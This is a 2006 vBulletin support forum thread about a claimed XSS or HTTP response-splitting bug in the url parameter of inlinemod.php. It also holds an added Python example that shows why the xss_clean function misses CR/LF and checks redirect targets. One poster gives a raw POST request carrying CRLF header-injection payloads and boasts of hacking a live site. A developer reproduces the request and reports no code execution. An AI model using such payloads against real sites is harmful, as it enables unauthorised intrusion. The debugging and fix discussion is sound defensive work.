vBulletin 3.5.4 XSS issue
GoNZo_
Tue 2nd May '06, 9:11pm
XSS attack.
The bug exists because of insufficient processing of input in the url parameter of inlinemod.php.
Example:
POST /vb354/inlinemod.php HTTP/1.0
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1
Content-Length: 93
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: www.vulnerable.com
Content-Type: application/x-www-form-urlencoded
do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a
I didn't find any way to fix it, but I hacked one website that uses vBulletin 3.5.4 :D
PS You don't need to ban me, I am doing this to help you guys :D
ManagerJosh
Tue 2nd May '06, 9:33pm
Can't confirm this in a 3.5.2 build.
Scott MacVicar
Tue 2nd May '06, 9:34pm
This was posted in the bug tracker this morning and neither Mike nor myself can reproduce this.
Apache 2.0.x, Apache 1.3.x and IIS were tested with a mixture of PHP applications. The end result was either a HTTP redirect OR a 301 moved message from Apache.
I doubt you hacked a site this was on, as it requires Mod privileges and somehow getting around the REFERRER checking and also hoping that the PHP version is < 4.4.2.
Feel free to post a site that this works on so I can check the PHP version and web server.
Scott MacVicar
Tue 2nd May '06, 9:49pm
Oh the function is exec_header_redirect for anyone interested :)
header("Location: $url");
header('HTTP/1.1 301 Moved Permanently');
Should also be noted that $url goes through xss_clean in class_core.php
function xss_clean(&$var)
{
    // Break the two script-scheme words so they cannot form a usable URI scheme
    static
        $preg_find = array('#javascript#i', '#vbscript#i'),
        $preg_replace = array('java script', 'vb script');
    // htmlspecialchars_uni() is vBulletin's own helper that escapes HTML metacharacters
    $var = preg_replace($preg_find, $preg_replace, htmlspecialchars_uni($var));
    return $var;
}
Just in case anyone wants to spend time reproducing it.
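Python model of the point above (an added example, not vBulletin's code): xss_clean only HTML-escapes and breaks the script-scheme words, so the CR/LF pairs in the url parameter reach header() untouched, and the redirect helper beside it shows the check a Location header needs. html.escape stands in for htmlspecialchars_uni, the payload is constructed from the request in this thread, and safe_location and allowed_host are names assumed for the example.

```python
import html
import re
from urllib.parse import unquote, urlparse

# Constructed from the request in the thread: the decoded url= parameter value.
CONSTRUCTED_PAYLOAD = unquote(
    "lala2%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3Ehey%3C/html%3E"
)

# Model of vBulletin's xss_clean(): escape HTML metacharacters, then split the
# two script-scheme words. Nothing here touches CR, LF or other control bytes.
_SCHEME_WORDS = [
    (re.compile(r"javascript", re.I), "java script"),
    (re.compile(r"vbscript", re.I), "vb script"),
]


def xss_clean(var: str) -> str:
    out = html.escape(var, quote=True)  # stands in for htmlspecialchars_uni()
    for pattern, replacement in _SCHEME_WORDS:
        out = pattern.sub(replacement, out)
    return out


def has_header_injection(value: str) -> bool:
    """True if the value could terminate or split an HTTP header line."""
    return re.search(r"[\r\n\x00]", value) is not None


def safe_location(url: str, allowed_host: str) -> str:
    """Return url if it is usable as a Location header value, else raise.

    Rejects any control character (the check PHP 4.4.2 added inside header(),
    which the thread refers to, done here explicitly so it does not depend on
    the runtime) and only allows site-relative paths or absolute http(s) URLs
    on allowed_host, so the redirect cannot be pointed off-site either.
    """
    if re.search(r"[\x00-\x1f\x7f]", url):
        raise ValueError("control character in redirect target")
    if url.startswith("/") and not url.startswith("//"):
        return url
    parts = urlparse(url)
    if parts.scheme in ("http", "https") and parts.hostname == allowed_host:
        return url
    raise ValueError("redirect target is not on the allowed host")
```

Running has_header_injection on xss_clean(CONSTRUCTED_PAYLOAD) returns True, which is exactly why the sanitiser does not help here.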
GoNZo_
Tue 2nd May '06, 9:50pm
Check it out lol :D:D:D:D
This is an exploit for ImpEx 1.74, PHP including in ImpEx
<zapped>
jmvb
Tue 2nd May '06, 9:57pm
Uh oh... Upgrade time again?
Scott MacVicar
Tue 2nd May '06, 10:03pm
ImpEx is not a core vBulletin module; it is only used while an upgrade is in progress.
Please stop posting "exploits" or you will be banned.
GoNZo_
Tue 2nd May '06, 10:09pm
ImpEx is not a core vBulletin module; it is only used while an upgrade is in progress.
But still it's a bug, sometimes people forget to delete ImpEx and here you go =)))
Scott MacVicar
Tue 2nd May '06, 10:13pm
This was fixed in CVS 6 months ago by jerry during a random audit and has already been mentioned.
I see you stopped mentioning the first "exploit" you used.
http://devbox/vb35x/inlinemod.php
POST /vb35x/inlinemod.php HTTP/1.1
Host: devbox
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://devbox/vb35x/forumdisplay.php?f=2
Cookie: bbuserid=1; vbulletin_collapse=templateusage; bbpassword=bd68d82513d0161c47b96e7da8bba794; acpcollapseprefs=100; bblastvisit=1143550886; vbcodemode=0; bblastactivity=1145913653; collapseprefs=100,debug; bbsessionhash=62d3fe42f097068a4d1bf2320425bc62; bbforum_view=ce615f0959e7373227560a9fc0b96672a-1-%7Bi-2_i-1146618953_%7D; vbulletin_inlinethread=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
do=clearthread&url=lala2%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont%20color=red%3Ehey%3C/font%3E%3C/html%3E
HTTP/1.x 301 Moved Permanently
Date: Wed, 03 May 2006 01:20:22 GMT
Server: Apache/2.0.54 (Unix) PHP/5.1.1 mod_perl/2.0.2 Perl/v5.8.3
X-Powered-By: PHP/5.1.1
Cache-Control: private
Pragma: private
Set-Cookie: vbulletin_inlinethread=deleted; expires=Tue, 03-May-2005 01:20:22 GMT; path=/
Location: http://devbox/vb35x/lala2
Content-Type: text/html
HTTP/1.1: 200 OK
Inject worked but the redirect still happened with no code execution.
vBulletin® v3.8.0 Beta 4, Copyright ©2000-2008, Jelsoft Enterprises Ltd.